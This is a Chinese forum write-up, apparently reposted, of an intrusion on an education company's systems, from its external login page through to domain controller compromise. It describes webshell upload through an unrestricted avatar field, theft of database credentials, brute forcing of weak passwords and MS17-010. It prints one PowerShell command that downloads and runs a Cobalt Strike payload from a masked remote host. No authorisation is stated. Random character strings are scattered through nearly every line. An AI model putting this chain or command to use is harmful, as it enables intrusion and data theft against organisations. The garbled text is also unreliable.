9 u( P+ P3 p' A2 k3 v 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路% g) H5 }3 x1 w7 r" F
) s; U- H% \) J7 |2 }1 A7 `" R0 }9 w }& g6 B, h* m$ s
1 H& R1 k1 U+ X5 }& [
) L% @+ E" N. H2 v8 ^2 h
J0 m! X/ ^* Q& d d# I0 e6 w 正文" b0 A. t5 q0 u$ ]) s4 @6 z
, E8 k. O; ^/ S$ `( {
" X) Q P; u6 U0 A
! D( }1 I" w6 \ + s! y a# m. P* H
) `% N" @( ^9 T. f$ h( G+ c
目标:www.xxxx.com(一家教育机构)
! @2 b) |+ L! G; z0 i打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
5 x: w0 R6 Z' D3 y
: e# N0 W7 L9 j* ^2 p1 `8 X' q( j4 t" }9 D; n; ]4 h8 C
8 d* @& W/ W8 d' D
; U4 A; W$ u6 c# Z& A0 W/ Z3 l+ H! x4 l
进行了简单的信息搜集 7 D H9 {: B2 I D: P: E4 J2 N
7 ~) H" x' e8 y. t7 V/ M
3 I1 E3 \. l& F6 a: l
7 h5 P' n# O4 A7 h( x" d- U% e: V7 c5 q& ]: B* q4 K3 B* t7 i. V
子域名搜集
# i/ u; w) m: P! ]% ] " \) j. g; g3 t1 O% Z {9 F ?
1 K+ k) }1 I: f: c Z
6 B. \" |- F1 W$ V; O: f . k, z T' ]# I6 P1 m7 S4 g( T0 L
5 x9 ?6 H! R' ?6 X fofa找资产 - S, q$ x% q! c/ h! p
2 o6 X: n1 G7 H, |( h
* \) a3 `- r4 n
: G. ~5 r# [2 I5 V" l5 o% O: o& U: m+ f. g
+ M& G' ~- |4 S+ T8 i" a# V
4 l a a3 I( _/ [) c* t3 u- }1 h: H9 n, K! A2 ^# c* S
一共七个资产。去重之后只有两个。 + _( a6 u, D9 Q" x
& z G1 U9 h' V5 Y9 O( t
- O/ v r; Y) E) u4 E5 r
: }9 G- Y/ J: o) @2 h0 j
, E; m) Q8 j+ o 目录探测( X& ^! X/ x+ s. i7 \
% m8 m# C0 ?) x% E5 e9 [$ h
5 _: r% k6 n& V' y: ^4 y3 O
1 K1 M; l/ [, L$ d; x& d8 w 7 S- F* `9 e# r
! v9 I% O6 l* d- |+ Q y
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% ]+ F5 t- Y+ C( e* H 0 ~9 ]6 _$ w( y4 d7 L- d
7 f. F/ H4 g* W8 J
, M1 z& B! L+ C: I% @3 Z/ I9 Z% H
+ X* y0 {$ f4 p. N2 r 我又尝试了通过修改返回包来绕过登录界面
. w( [' k* D: E1 J/ h( L% s* r8 w * v1 J% N! i( l% r( |
3 G* A7 c; k' R/ Y+ g8 `
0 ]7 p, }2 Y4 p& U
, m0 o6 \$ r% f& J8 s" ? x# l- C1 z. F2 p7 i( n0 o
还是不行,尝试注入无果
1 N; S0 \% c& x6 A' l
9 g) ?# m& r- j4 E. N% O+ \ u/ O# Q8 t5 Q: i
+ X! {4 ?( j! r2 s* e9 C, P
2 J+ k- T- w8 H' _
$ X5 g# u* ~3 n$ X' i 不过我目录探测出了一处Spring信息泄露 " e; Q# G9 b9 B$ S$ Y) W( ]
) ?6 A- K' @( h& v- C. t
: {5 T' x0 X2 ^( n" Y
* N/ _ ~! J* n6 A0 s
9 a8 A) u, g4 ] ; o: e* v3 U0 h$ T
9 h q0 Z9 L1 a8 C% s! Q$ C; Q1 S4 ]9 b! ?* U
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 F7 |; s8 |' r: L* P- \
5 O. Q# t9 w2 M9 E
# L) ], ?6 W) V) {! k5 p/ h 5 a( c& D; D n% F
& U c& e6 u* p& B6 R' M. O5 m4 K! j! y' y( p& j
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。5 @. L3 k( s4 V5 P
: {6 _% q' q5 ]" m8 x; F
$ l, S- q$ Y& {/ `* ]! z. c
7 q* F. F1 U2 _ L* r
8 ^) Z, O# f" g
+ ?, v$ k/ ~# M& p$ U
获取有些师傅到这一步就手机抓包电脑测了。+ W1 V/ ]% x2 U7 N* ?" \
9 F5 J3 q3 c0 _2 u& r
3 ?% P7 l$ f# L4 Y Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
, [: l* z2 s- H- { 1 b: {0 |& `# X7 B1 L
1 t" }# q5 f' l6 |9 [
其中在一个公众号发现了小程序,可以进行注册。6 {5 [! l% J, J2 c
7 Q3 m9 ` J% b
+ q9 j, f+ J! }0 r* U1 H 看到了头像上传,尝试上传获取WebShell3 w) n: I1 e0 ?4 @' H* g: z, d
H* C! C9 y/ m s# l f2 z( E0 N5 P6 u4 V+ w% i* @+ a: Q; C% q
8 t* K; @% X% G# s
h# s- n$ A7 l( X6 \# e' Z
7 s4 u8 {/ R: ?, ]& q, |- p: l5 u6 D 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
8 [, \3 c5 m7 k& K
g' Z' r7 B1 J( t t3 v8 ^" t) h+ ~
) {& _1 k4 Y9 z0 y* G2 W9 I5 B
# ~. i V" f5 t! L
5 G* w: M3 x. z7 f3 @1 L4 \ 然后上了大马5 V# u2 d4 W7 y' i+ S: s
4 }, e8 X) V, [* `. n9 i% \
5 y! g7 _5 f P6 c% h! p; k" R K ! o& ?' Z: I: k) I+ L; T
9 j e, v) c' r/ \
" _) C3 G4 J2 ^5 C5 b8 Y
6 c! [+ {4 t0 W [- g
, [3 ~+ {8 Y, L, O$ r% S) L+ ]
3 w( }# h! H: {0 ~: Q( h% p2 \
通过翻找文件发现数据库账号密码
5 z( H6 H1 J) i& o+ Y
+ ^7 z2 Z, }0 C* b2 q3 `6 O" M$ O8 A% m
' v( `' p6 Z, X$ z* d! G8 K* \
! {$ ^" R2 \ Y3 v6 `2 j$ ^4 K0 U5 b
--内网渗透
8 Z: K( m" x D& U1 D
0 P; O+ q% v s ?1 p5 P6 w# C" y
直接通过powershell执行 cs上线, V" H( E1 N% y; m V$ ]% O. b
0 M# F2 F( e. s% D, E/ C
2 v( Q- Z. Q+ _& P/ s: ~2 R powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% \& s8 E5 Z' \- Q0 ~8 V
! S! O9 ^+ X2 b. C/ E
9 b% x' b6 \# E$ X2 |
% f' t& Q) ^$ K, |( F! `
/ ~/ c: i0 f9 Z# ^& C6 [3 J O+ h* T; c& `1 H1 _5 L
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
/ e. E8 g9 Z9 ^; s0 w a- o
( a6 f6 [" r/ N, }
9 e* p6 E1 ~) c, I7 b
: S( B, W' k2 {* j- q% m
; c7 y0 T5 u% l+ X3 D* `$ ^, q7 J! A+ V- }8 V2 j
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 % R1 Z8 r0 N/ l9 `1 L" C
E7 D0 t8 ^6 Y3 e R& z : `" s. \3 [4 D; I- u! y
: [5 I$ E5 H+ j& r6 w2 O
4 O/ w% _4 @( V3 S# ?
0 k ^5 a% t2 h2 j/ T; ` ) d/ I, G+ ~: C3 z# @
0 B, ?( O4 b! m+ \' S
, a s' x. X" @/ R
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
8 ?" J9 C% j/ c& x# D2 y6 c$ @ * w. T& G, r# G- w+ P& q* L
- A0 B$ ?: r7 p. m. R
7 f( B7 r) s9 {7 Y+ |* Z g l# @' [! K# {/ f7 F
2 X+ d: L q2 a& h/ ?. E % w* }* r& N" n: f
3 x; I! n, m5 L$ V8 } 1 a0 S* l1 ?- E$ P
* i' O0 \& J. O- z# }
" l' L5 b+ u1 ~ @. {/ Z. r
2 Y" u, T3 c% S. J9 o0 u; o
4 _1 l- }$ P3 W
( Y. i, O6 q* o7 N! E9 l" z
5 r4 A1 q9 t: H' _) k
8 q* Q. v0 g9 {9 J) w j 小结
) o% ~; S2 m+ J) |" m , l8 R" n5 R0 t+ }+ e* h
2 Y8 n7 t) I6 v8 g3 r" p
8 F9 r0 [' s, H- y/ C$ k- X4 U! g 7 A5 W5 K, A, [
+ s8 C9 S1 z x7 w9 g. m# G! |
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!8 V. Y( `8 o0 S' W( J4 s# Z
5 [6 c; m3 z# J" k* H- p7 z
+ g0 Q, g: h+ k N" `. E% K8 P4 v5 y 7 x- M$ q2 S6 ~8 R+ x Z0 x: \# @8 `8 x
1 ?* [4 J5 Y0 }; T) j. A5 {5 A2 L
. T2 j2 j; p- y/ t/ f! W - , ]0 _$ K( F6 n% B
" b9 L/ b* Z9 v4 i H/ y& D8 K
9 e. f L3 M6 c$ m
- " o+ B5 |6 Z$ Y' X3 d) ~( d
) t, T; i+ ^! d/ o
4 x u# n. I( {, n" G0 S7 Q ! [2 }) k: W- \. C
3 }1 \8 @1 V# J) c2 y
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
. z- F( y! f7 q# q# V6 W2 [ $ q) I, }. l$ P3 X+ u; \0 y
7 C! ]3 v* S& v) `
. E4 V2 R+ T1 N* h
|